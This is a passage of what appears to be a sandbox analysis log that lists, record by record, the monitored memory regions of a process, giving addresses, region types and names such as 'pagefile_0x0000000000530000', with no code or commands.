start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9894 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9895 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9896 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9897 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9898 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9899 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9900 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9901 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9902 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9903 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9904 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9905 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9906 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9907 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9908 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 9909 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9910 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9911 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9912 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 9913 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9914 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9915 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9916 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9917 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9918 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9919 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9920 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9921 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9922 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9923 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9924 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9925 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9926 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9927 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9928 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9929 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9930 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 9931 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9932 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9933 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9934 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9935 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9936 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9937 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9938 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9939 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9940 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9941 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9942 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9943 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9944 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9945 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9946 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9947 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9948 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9949 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9950 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9951 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9952 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9953 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9954 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9955 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9956 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9957 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9958 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9959 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9960 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9961 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9962 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9963 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9964 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9965 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9966 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9967 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9968 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9969 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9970 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9971 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9972 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9973 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9974 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9975 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9976 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9977 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9978 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9979 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9980 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9981 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9982 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9983 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9984 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9985 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9986 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9987 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9988 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9989 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9990 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9991 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9992 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9993 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9994 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9995 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 9996 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 9997 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 9998 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 9999 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10000 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10001 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10002 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10003 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10004 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10005 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10006 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10007 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10008 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10009 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10010 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10011 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10012 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10013 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10014 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10015 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10016 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10017 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10018 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10019 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10020 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10021 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10022 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10023 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10024 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10025 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 10026 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10027 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10028 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10029 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10030 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10031 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10032 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10033 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10034 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10035 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10036 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10037 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10038 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10039 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10040 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10041 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10042 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10043 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10044 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10045 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10046 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10047 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10048 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10049 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10050 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10051 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10052 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10053 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10054 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10055 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10056 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10057 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10058 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10059 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10060 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10061 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10062 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10063 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10064 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10065 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10066 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10067 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10068 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10069 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10070 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10071 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 10072 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 10073 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10074 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10075 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 10076 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10077 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10078 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10079 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10080 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" 